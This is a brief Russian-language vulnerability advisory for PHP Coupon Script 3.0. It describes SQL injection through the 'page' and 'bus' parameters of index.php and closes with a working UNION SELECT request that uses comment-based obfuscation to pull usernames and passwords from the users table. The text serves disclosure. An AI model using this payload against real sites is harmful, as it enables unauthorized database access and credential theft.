Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PHP Coupon Script 3.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «page» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
index.php?page=viewbus&bus=-1/**/union/**/select/* */null,null,null,username,password,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null/* */from/**/users/*